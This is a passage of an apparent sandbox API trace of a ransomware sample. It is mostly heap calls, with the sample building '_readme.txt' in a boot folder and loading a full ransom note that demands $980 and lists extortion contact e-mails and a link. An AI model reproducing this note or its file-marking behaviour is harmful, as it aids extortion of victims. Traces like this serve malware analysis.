Size=0x830) returned 0x3b15070 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.792] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.792] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.792] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.792] PathFindFileNameW (pszPath="") returned="" [0200.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.793] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.793] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.793] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.793] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.793] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0200.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.793] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0200.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.794] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.794] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.794] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.794] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.794] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.794] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.794] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.794] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.795] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap 